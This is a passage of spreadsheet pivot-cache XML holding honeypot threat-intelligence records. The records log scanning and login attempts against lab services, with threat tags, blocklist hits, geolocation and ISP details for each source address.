    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H23&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100&amp;&amp;10003&amp;&amp;60864&amp;&amp;9017"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:866b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3487"/>
    <x v="3487"/>
    <s v="ec2-13-216-241-88.compute-1.amazonaws.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T21:02:34"/>
    <d v="2025-04-02T20:58:03"/>
    <d v="2025-04-02T21:02:34"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="Amazon.com, Inc."/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="2019-10-01"/>
    <s v="AT-88-Z"/>
    <s v="2021-02-10"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dd8:f158"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3488"/>
    <x v="3488"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T21:02:04"/>
    <d v="2024-12-19T13:11:07"/>
    <d v="2025-04-02T21:02:04"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai (Azad Nagar)"/>
    <s v="1275339"/>
    <s v="400053"/>
    <s v="19.0355"/>
    <s v="72.9454"/>
    <s v="134937"/>
    <s v="Speed Communication"/>
    <s v="Sukain Infoway Pvt Ltd"/>
    <s v="business"/>
    <s v="Sukain Infoway Private Limited"/>
    <s v="2017-07-18"/>
    <s v="SUKAIN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6761:601e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3489"/>
    <x v="3489"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T20:54:29"/>
    <d v="2023-07-25T11:51:00"/>
    <d v="2025-04-02T20:54:29"/>
    <n v="2042"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_DNS_H2&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;80&amp;&amp;53&amp;&amp;9100&amp;&amp;1080&amp;&amp;445&amp;&amp;1521&amp;&amp;21&amp;&amp;443&amp;&amp;15847&amp;&amp;23&amp;&amp;47848&amp;&amp;NA&amp;&amp;56001"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-12-08"/>
    <s v="TINP-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:eadd"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3490"/>
    <x v="3490"/>
    <s v="NA&amp;&amp;59-127-140-23.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T20:53:59"/>
    <d v="2025-01-16T16:28:49"/>
    <d v="2025-04-02T20:53:59"/>
    <n v="504"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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3b7f:8c17"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3491"/>
    <x v="3491"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T20:48:47"/>
    <d v="2025-03-03T16:08:20"/>
    <d v="2025-04-02T20:48:47"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:80c2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3492"/>
    <x v="3492"/>
    <s v="NA&amp;&amp;125-228-47-45.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T20:45:26"/>
    <d v="2024-09-07T19:35:00"/>
    <d v="2025-04-02T20:45:26"/>
    <n v="534"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_IRC_H25&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;1433&amp;&amp;6667&amp;&amp;23&amp;&amp;38099&amp;&amp;9100&amp;&amp;61410&amp;&amp;NA&amp;&amp;6189"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de4:2f2d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3493"/>
    <x v="3493"/>
    <s v="NA&amp;&amp;node-ycm.pool-125-26.dynamic.totinternet.net"/>
    <x v="0"/>
    <d v="2025-04-02T19:59:03"/>
    <d v="2025-03-31T21:53:36"/>
    <d v="2025-04-02T19:59:03"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bangkok Yai"/>
    <s v="Bangkok Yai"/>
    <s v="1619457"/>
    <s v="NA"/>
    <s v="13.7232"/>
    <s v="100.476"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="business"/>
    <s v="TOT Public Company Limited"/>
    <s v="2006-10-26"/>
    <s v="totnet"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2019-05-14 09:00:25"/>
    <s v="2026-05-14 09:00:25"/>
    <s v="2023-05-18 14:44:23"/>
    <s v="['CORA.NS.CLOUDFLARE.COM', 'PHIL.NS.CLOUDFLARE.COM']"/>
    <s v="GMO Internet, Inc."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:7d1a:ade6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3494"/>
    <x v="3494"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T19:55:51"/>
    <d v="2025-04-02T19:54:13"/>
    <d v="2025-04-02T19:55:51"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_IMAP_HC1"/>
    <s v="143"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="NA"/>
    <s v="45.4643"/>
    <s v="9.18951"/>
    <s v="9009"/>
    <s v="M247 Europe SRL"/>
    <s v="M247 Europe SRL"/>
    <s v="hosting"/>
    <s v="M247 LTD"/>
    <s v="2018-12-11"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_IMAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c091:7fd2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3495"/>
    <x v="3495"/>
    <s v="220-133-147-229.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T19:40:28"/>
    <d v="2024-09-06T07:01:00"/>
    <d v="2025-04-02T19:40:28"/>
    <n v="295"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H8&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;35716&amp;&amp;9100&amp;&amp;19717"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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dc85:93e5"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3496"/>
    <x v="3496"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T19:34:38"/>
    <d v="2025-04-02T09:21:25"/>
    <d v="2025-04-02T19:34:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RN"/>
    <s v="Rio Grande do Norte"/>
    <s v="São José do Campestre"/>
    <s v="São José do Campestre"/>
    <s v="3388437"/>
    <s v="NA"/>
    <s v="-6.31556"/>
    <s v="-35.7139"/>
    <s v="267619"/>
    <s v="AGRESTE TELECOMUNICAÇÕES EIRELI-ME"/>
    <s v="AGRESTE TELECOMUNICAÇÕES EIRELI-ME"/>
    <s v="business"/>
    <s v="AGRESTE TELECOMUNICAÇÕES EIRELI-ME"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d47:78a4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3497"/>
    <x v="3497"/>
    <s v="114-35-79-85.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T19:29:46"/>
    <d v="2024-04-16T12:40:07"/>
    <d v="2025-04-02T19:29:46"/>
    <n v="426"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;19359&amp;&amp;80&amp;&amp;NA&amp;&amp;23&amp;&amp;65327&amp;&amp;63142&amp;&amp;9100"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7223:4f55"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3498"/>
    <x v="3498"/>
    <s v="125-228-185-64.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T19:29:43"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-02T19:29:43"/>
    <n v="603"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
